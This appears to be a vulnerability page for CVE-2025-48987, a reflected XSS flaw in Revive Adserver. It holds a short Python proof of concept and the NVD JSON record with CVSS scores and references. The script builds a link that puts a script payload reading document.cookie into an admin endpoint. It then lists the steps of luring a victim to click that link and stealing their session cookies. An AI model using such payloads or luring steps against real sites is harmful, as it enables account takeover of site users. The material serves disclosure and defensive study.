CVE-2025-48987

import urllib.parse # CVE-2025-48987 Reflected XSS PoC for Revive Adserver # Target: Revive Adserver < = 5.5.2, 6.0.1 def generate_xss_payload(): """ Generate malicious URL for reflected XSS attack """ # XSS payload - alert box to demonstrate vulnerability xss_payload = '<script>alert(document.cookie)</script>' encoded_payload = urllib.parse.quote(xss_payload) # Target URL (adjust path based on vulnerable endpoint) target_host = 'http://target-server/revive-adserver/' vulnerable_endpoint = 'admin/index.php' # Construct malicious URL with XSS payload in parameter malicious_url = f"{target_host}{vulnerable_endpoint}?param={encoded_payload}" return malicious_url # Generate and display the PoC URL print('CVE-2025-48987 Reflected XSS PoC') print('=' * 50) print(f'Target: Revive Adserver < = 5.5.2, 6.0.1') print(f'Vendor: Revive Adserver') print(f'Vulnerability Type: Reflected XSS') print('=' * 50) print(f'Malicious URL: {generate_xss_payload()}') print('\nAttack Scenario:') print('1. Attacker crafts malicious URL with XSS payload') print('2. Attacker tricks victim into clicking the link') print('3. Victim browser executes injected JavaScript') print('4. Attacker steals session cookies or performs actions as victim')

{"cve": {"id": "CVE-2025-48987", "sourceIdentifier": "[email protected]", "published": "2025-11-20T20:16:22.550", "lastModified": "2025-11-25T18:56:45.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes a potential reflected XSS attack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.5.2", "matchCriteriaId": "47AC2D81-BA0C-404A-B6F6-31151956D422"}, {"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.1", "matchCriteriaId": "42E4B7BD-5F7B-4FBE-93D2-C19F30FA5A51"}]}]}], "references": [{"url": "https://hackerone.com/reports/3399191", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://hackerone.com/reports/3399191", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}